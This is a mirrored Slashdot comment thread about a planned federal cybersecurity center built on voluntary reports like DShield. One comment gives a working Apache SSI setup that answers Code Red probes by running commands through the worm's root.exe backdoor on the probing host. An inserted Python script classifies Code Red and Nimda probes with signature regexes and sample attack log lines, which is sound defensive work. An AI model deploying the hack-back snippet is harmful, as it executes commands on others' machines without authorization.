Slashdot Mirror


Federal NOC To Be Modeled After Incidents.org / DS

An anonymous reader writes "Computerworld is covering in more detail the new Federal 'Cybersecurity Center.' The article explains that unlike some earlier rumors indicated, the center will not try to build a super-carnivore, but instead use voluntary reports. It will be similar to the SANS Institute's Internet Storm Center, which summarizes contributions submitted to DShield.org. This system of voluntary contributors has been shown to be effective in the past by issuing early warning for a number of major Internet worms, like Code Red, Ramen and SQLSnake. Unlike Symantec's 'for pay' DeepSight service, which publishes alerts only to paying members, Incidents.org is a free service."

30 comments

  1. Nice formatting by glam0006 · · Score: 0

    Why did this anonymous coward choose to put a
    in his submission?

  2. follow-up on CodeRed/Nimda by valmont · · Score: 3, Interesting
    A few months ago I posted a follow-up in my /. journal on Code Red and Nimda queries sent to my Apache server through my residential DSL connection. I gathered a list of *all* unique queries I've received so far.

    I also came up with a few shell scripts used as CGI to make HTTP requests back to offending hosts, exploiting the very vulnerabilities they're probing me for, to place "WARNING YOU ARE INFECTED" text messages at strategic locations on their hard drives. Drop a note on my journal comments if you need more info on that.

    1. Re:follow-up on CodeRed/Nimda by Sobrique · · Score: 2, Informative

      The problem with doing this is that you are committing a criminal offence by doing so. You are effectively, and wilfully, committing a breach of some computer law in your country.
      It's one of those long discussions for a rainy afternoon, but IMHO you need to be careful doing that. After all, Code Red/Nimda is just a worm, but if someone catches you hacking their server, then it'll be you in trouble.
      Some discussion occurred on various SecurityFocus mailing lists regarding this point. (I haven't posted a link, because the load on the SecurityFocus website is too high at the moment.)

    2. Re:follow-up on CodeRed/Nimda by Phroggy · · Score: 2

      I made a .htaccess file containing:

      # #exec only works when Options +Includes is in effect (here or in httpd.conf);
      # IncludesNOEXEC would silently disable it
      Options +Includes
      AddType text/html .ida
      AddHandler server-parsed .ida

      Then made a file called default.ida that looks like this (the part between <!-- and --> is all on one big long line):

      <HTML>
      <HEAD>
      <TITLE>Go away.</TITLE>
      </HEAD>
      <BODY>

      This server runs Apache on Linux. It is immune to Microsoft viruses and worms.
      <!--#exec cmd="/usr/bin/lynx -dump http://$REMOTE_ADDR/scripts/root.exe\?/c+net+send+localhost+%22Your+Web+server+has+been+infected+with+a+virus.++I+know+this+because+your+server+tried+to+infect+my+server.++I+sent+you+this+message+because+I+am+a+nice+guy.++Someone+else+may+not+be+so+nice,+and+this+virus+lets+them+steal+your+data,+erase+your+hard+drive,+or+anything+else+they+want.++Please+fix+your+server,+or+take+it+offline.%22 >/dev/null 2>/dev/null" -->
      </BODY>
      </HTML>

      --
      $x='S24;r)>63/* h@<5+oZ)32"5cz';$me='phroggy'x$];
      $x=~y+ -xz+\0-Tx+;print$_^chop$me for split'',$x;
    3. Re:follow-up on CodeRed/Nimda by valmont · · Score: 2
      very cool :)
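    The two comments above deal with the same raw material the new center (and DShield) would be fed: web-server logs full of Code Red and Nimda probes. Rather than striking back, the thing a contributor actually needs is a way to pick the worm requests out of an Apache access log, keep the list of unique probe strings, and tally hits per source so the noisiest offenders can be reported upstream. The script below is an added example written for this page; it is not code from the thread, from DShield or from the Internet Storm Center. The probe signatures are the widely documented Code Red (.ida) and Nimda (root.exe / cmd.exe traversal) request paths, the log lines are constructed, and the report format is a plain per-source tally, not DShield's submission format.

```python
"""Classify Code Red / Nimda probes in Apache access logs and tally them per source IP.

Added example (not code from the original thread). SAMPLE_LOG is constructed;
the Code Red payload is shortened. Signature patterns are illustrative, not a
complete IDS ruleset.
"""
import re
from collections import Counter, defaultdict

# Apache "common"/"combined" log line; only the fields used here are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)(?: [^"]*)?" (?P<status>\d{3}) '
)

# Ordered so that a specific worm signature wins over the generic traversal check.
SIGNATURES = (
    ("CodeRed", re.compile(r"^/default\.ida\?", re.I)),       # .ida ISAPI overflow probe
    ("Nimda-root.exe", re.compile(r"/root\.exe\?", re.I)),    # cmd.exe copy left by Code Red II, reused by Nimda
    ("Nimda-cmd.exe", re.compile(r"/cmd\.exe\?", re.I)),      # direct or traversal path to cmd.exe
    ("Traversal", re.compile(r"\.\./|%2e%2e|%c0%af|%c1%1c|%255c|%5c", re.I)),  # IIS decode tricks
)


def parse_line(line):
    """Return {ip, ts, method, path, status} for one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def classify(path):
    """Return the first signature name matching a request path, or None if it looks benign."""
    for name, pattern in SIGNATURES:
        if pattern.search(path):
            return name
    return None


def summarize(lines):
    """Tally probes per source: ({ip: Counter({signature: hits})}, set of unique probe paths)."""
    per_source = defaultdict(Counter)
    unique_paths = set()
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue  # unparseable line: skip rather than guess
        sig = classify(rec["path"])
        if sig is None:
            continue  # ordinary traffic
        per_source[rec["ip"]][sig] += 1
        unique_paths.add(rec["path"])
    return per_source, unique_paths


def report(per_source, min_hits=1):
    """Rows of (ip, total_hits, {signature: hits}), noisiest source first; min_hits drops one-off noise."""
    rows = [(ip, sum(c.values()), dict(c)) for ip, c in per_source.items() if sum(c.values()) >= min_hits]
    rows.sort(key=lambda r: (-r[1], r[0]))
    return rows


# Constructed sample log (RFC 5737 documentation addresses); the .ida payload is truncated.
SAMPLE_LOG = """\
192.0.2.10 - - [19/Sep/2001:03:12:44 -0700] "GET /default.ida?NNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858=a HTTP/1.0" 404 292 "-" "-"
192.0.2.10 - - [19/Sep/2001:03:12:45 -0700] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 292 "-" "-"
192.0.2.10 - - [19/Sep/2001:03:12:45 -0700] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 290 "-" "-"
192.0.2.10 - - [19/Sep/2001:03:12:46 -0700] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299 "-" "-"
192.0.2.10 - - [19/Sep/2001:03:12:46 -0700] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310 "-" "-"
198.51.100.7 - - [19/Sep/2001:03:15:01 -0700] "GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 316 "-" "-"
203.0.113.42 - - [19/Sep/2001:03:16:20 -0700] "GET /index.html HTTP/1.1" 200 1043 "-" "Mozilla/4.0"
203.0.113.42 - - [19/Sep/2001:03:16:21 -0700] "GET /images/logo.png HTTP/1.1" 200 5120 "http://example.org/index.html" "Mozilla/4.0"
"""

if __name__ == "__main__":
    sources, paths = summarize(SAMPLE_LOG.splitlines())
    for ip, total, counts in report(sources, min_hits=2):
        print(f"{ip:16} {total:4d}  {counts}")
    print("unique probe paths:")
    for p in sorted(paths):
        print("  ", p[:70])
```

    Run it against a real log with `summarize(open("access_log"))`; raising `min_hits` separates hosts that are actively scanning from a single stray hit, which is the distinction a central correlator wants before anyone is contacted or null-routed. Classifying on the request path alone means a host that merely looks at the page is never flagged, and nothing is ever sent back to the probing host.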

  3. wow big dilemma by Christianfreak · · Score: 2

    On one hand it's free and should provide useful information to keep our networks and computers secure. On the other hand it's run by the government which of course we all know is bad ... choices choices :)

    (right now some slashbot's head is exploding! :) )

  4. Good idea by Spazholio · · Score: 0

    Seems like a sort of Bugtraq list for viruses and malicious code. Sounds like a great idea, if it can get off the ground. Let's hope it does.

  5. Now, if only we could report Klez.... by wowbagger · · Score: 3, Interesting

    I just want a way to stop the damn Klez worms I keep getting emailed from pixie.udw.ac.za (a university in South Africa). I've mailed their admin repeatedly, mailed their faculty, even mailed their upstream. The closest thing to a response I've gotten was a response from one of the faculty saying "Yeah, we are getting hammered by that too."

    What we need is a good way to force admins to actually ADMINISTER the systems they are responsible for, and should they refuse, to get the upstream to null-route the machine until it is fixed.

  6. Protection or detection? by Spazholio · · Score: 1, Insightful

    I'm a little unsure of what this will accomplish. Is it only going to alert you to the newest threats out there, or is it actually going to give info on how to protect your computer from them as well? Hopefully, one would think one would naturally lead to the other, but as someone already said, this IS the government running it. =)

  7. "but instead use voluntary reports" by IGu · · Score: 0, Flamebait

    voluntary reports ...
    this is the same thing as in '80s communism (i know, i lived there)
    next thing you know is they are going to put us all in flats so they can monitor us better (i hope i don't give any ideas)
    something is rotten in the internet

  8. Duplicating private sector by sjanich · · Score: 4, Insightful

    Wouldn't it make more sense, instead of spending money building something like incidents.org, to fund incidents.org partially with grant money from the feds, so that it can beef up somewhat, and create a Federal liaison team? They would spend less and get their goal quicker.

    1. Re:Duplicating private sector by tubabeat · · Score: 3, Interesting

      It would, any fool could see that. So... given that governments usually have a high concentration of fools... we could reasonably assume they already worked that out. Which can only mean that they want to control it. Now why might a government want to suppress computer security alerts...?

      --
      "Linux is a serious competitor"
      - Steve Ballmer, Chief Executive Microsoft Corp.
    2. Re:Duplicating private sector by RollingThunder · · Score: 3, Insightful

      Not if you want to start doing DShield-like data correlation, but from the ubersecure (snicker) internal government systems.

      People would have an absolute bird if it got out that attempted access logs from #insert government agency here# were being sent to a NGO for correlation.

      Although I won't deny that some greenbacks for incidents.org would be a great idea.

  9. Good Idea by extagboy · · Score: 2, Insightful

    Seems like a good idea as long as anonymous contributions from the public are welcome and uncensored. If it turns into a government throttled source of information, it won't be any good to anyone.

  10. I'd use it by rczyzewski · · Score: 0

    I'd use it, but I wouldn't necessarily keep it as my only source of information. There are still a lot of other pieces out there that could be overlooked or ignored.

  11. Re:Attention Slashdorks by zapfie · · Score: 1

    Troll, perhaps, but very true.

    --
    slashdot!=valid HTML
  12. Re:Attention Slashdorks by Anonymous Coward · · Score: 0

    I did.

  13. MEEPT!! by Anonymous Coward · · Score: 0

    Ho! Ho! Between the ads for sourceFake and the postings from UA Hardware employees, slapdown looks more like masteurbation every day!

    MEEPT!!

  14. IT purchases must be _certified_ for security? by cfadam · · Score: 3, Insightful

    Did anyone else notice this statement:

    "In an interview with Computerworld last month, Clarke said the plan may include a governmentwide policy that requires all IT purchases to be independently certified for security prior to approval."

    I would like to know what it takes for a product to get "independently certified for security", and how would/does this affect OSS?

    (If this has been posted and answered in the past, please mod me down.)

  15. Re:IT purchases must be _certified_ for security? by Louis_Wu · · Score: 2
    I would like to know what it takes for a product to get "independently certified for security", and how would/does this affect OSS?

    If this has been posted and answered in the past, please mod me down.

    It has been posted, but not sufficiently answered. :)

    The tentative answers which I have seen seem to end up saying that any commercial certification would probably cost too much for OSS/FREE and that any government cert would be biased by established software companies "adding their expertise and experience to the process". (Unless those commercial certs were aimed specifically at OSS/FREE, in which case they would be the victims of discrediting campaigns by the other commercial certs. Which would leave the costly certs as the only "respectable" certs around.) Much weeping and gnashing of teeth, but I still haven't seen any good solutions. Maybe I've missed something.

    Side note, we do need companies giving input to government regarding what those corporations are knowledgeable about and good at, but that needs to be tempered by honest gov't types who have a clue about the industry. Think USPTO with clueful people running it. EX: I'm not much of a programmer, but if I were reviewing a patent application for a new sort method, I would have a good idea about where to start looking for info.

  16. Why do you care? by alexhmit01 · · Score: 2

    You should want OSS because it respects your rights. You shouldn't care what others use.

    The government (or a company) wants a verified, legit product? Fine. They don't use an OSS OS (like a downloaded copy of Linux), they buy copies of Redhat Linux.

    Why do you care?

    Why is everyone here worried what other people are doing?

    Alex

    1. Re:Why do you care? by cfadam · · Score: 2, Insightful

      I care because I don't want to see open-source security products viewed as a lesser-quality product due to funding issues on the part of its contributors. If the government is going to install something as important as security software, they should have the right to choose the best product period, not just the best commercial product.

      If the cost of certification is too great, that may also stop smaller security companies from being evaluated as well, also due to funding problems.

      We shouldn't trust our nation's security only to those with deep pockets.

      - A

  17. What's the matter by Anonymous Coward · · Score: 1, Funny

    Even trolls hate this story? Damn.. such a boring story...

  18. bloated budgets by ohzero · · Score: 1

    I remember reading the exact same article about the NIPC (mentioned in this article), and how it was supposed to do all the things that this center is supposed to do. We have highly paid people running around in very costly facilities who are definitely not the most clued people in the industry, because regardless of the dot-com fallout, network security salaries haven't dropped too much (xxx,000). I wonder if maybe next year, we can build another center so that it can collect data from this new center, plus the NIPC and whatever other centers have been built to either collect data on other centers or from actual events. This is a crock of shit.

    --
    -- http://www.criticalassets.com
  19. Gov's first simple steps, NIST will lead on by turtleshadow · · Score: 2, Insightful

    This is NOT news to anyone that has been following CSRC NIST SP-800 publications that have been trickling out of Gaithersburg, MD for some time. They are even reaching out to small business.

    Establishing a decent list of the telco demarcs and physical inventory and assessment of vital devices was the 1st thing and probably done to a good tolerance. This is the next step. Get all the traffic reports going to a central NOC.

    NIST has been writing fairly decent and comprehensive publications that deal with firewalls, email, WAP and assessment of security position. And surprisingly the public, it seems, has been regularly asked to comment based on what is occurring every day in business IT.

    Currently with the release of the ASSET evaluation tool, Fed agencies and departments no longer have a rug to sweep years of poor planning and practice under.

    I'd fully expect that in a few years, use of this Federal NOC and its services of cross site and network attack detection ability could be put into a FIPS standard of some sort. Those that deal with GOV will have to deal with GOVs rules.

    If I was a federal law enforcement agency it would be an easy sell.

    Sharing GOV net traffic information parallels the concept of sharing "most wanted" lists, prison rolls, evidence research, cold leads and what not.

    I just wish the US Gov would also do the same for spammers for theft of services!

    It's not a surprise that nearly 100% of all Federal buildings and critical facilities have a small number of meatspace entry points which are screened and watched; why should we expect different for Internet, Extranet and Intranet spaces?

    I foresee the American Internet much like American banks in the 1930's. We are past the "glory" bandits like Bonnie and Clyde stage and are just getting weary of the wannabe criminals.

    It was about that time the FBI was established to chase after cross-jurisdiction criminals. The Bureau with many other institutions like insurance companies insisted banks put in physical measures, guards, bars, silent and audible alarms, robbery training for staff, proof of executing government regulations, etc.

    I predict in 8 years the insurance industry will up your premiums for not having a syslog server, not having a written and practiced fair use policy with employees, not having firewalls between vital resources and untrusted segments of your business. Heaven help come audit time!

    My friends computers are rock, metal, plastic and air -- not majik. Get over it.

    Reading any of the NIST program documents and having any experience with business consolidation helps in what to forecast next.

    My bet is the US Gov to institute internal national EDI networks based on XML exchanges to negotiate terms of service and usage of resources. Quasi-privatized EDI would preclude any undesirables and non-participant networks.

    My 2c

  20. Oh no, think of the children by Anonymous Coward · · Score: 0

    Am I allowed to make a wild guess?

    When the .gov spends enough money to get some IDS and firewall log collection facility up, they will get exactly as many reports as in the DShield DB (which covers the rest of the net), but none from the admins who still have IIS serving 3 pages of out-of-date info, or worse, are running it default install, without pages at all. These are also unlikely to notice this "department of net security", or yet again worse, they will notice it and think they are secure because others are patrolling their nets now.

    So now the US government will spend all its time tracking down useless port 80 scans and Code Red attacks, even though by now someone there should have got the message that they should send someone around to whack every .gov admin who has a vulnerable site of some sort on the head and give them the choice: read up on the basics of security or get fired and replaced by someone who has had to for example explain during their job interview why MS downplaying the SSL certificate path mistake in Internet Explorer is a really bad thing. ( "Doing this would likely require that the attacker be able to modify the Internet infrastructure that the user transited, via a technique such as DNS cache poisoning" or abusing wireless networks, how is the Microsoft solution for this problem coming along again?)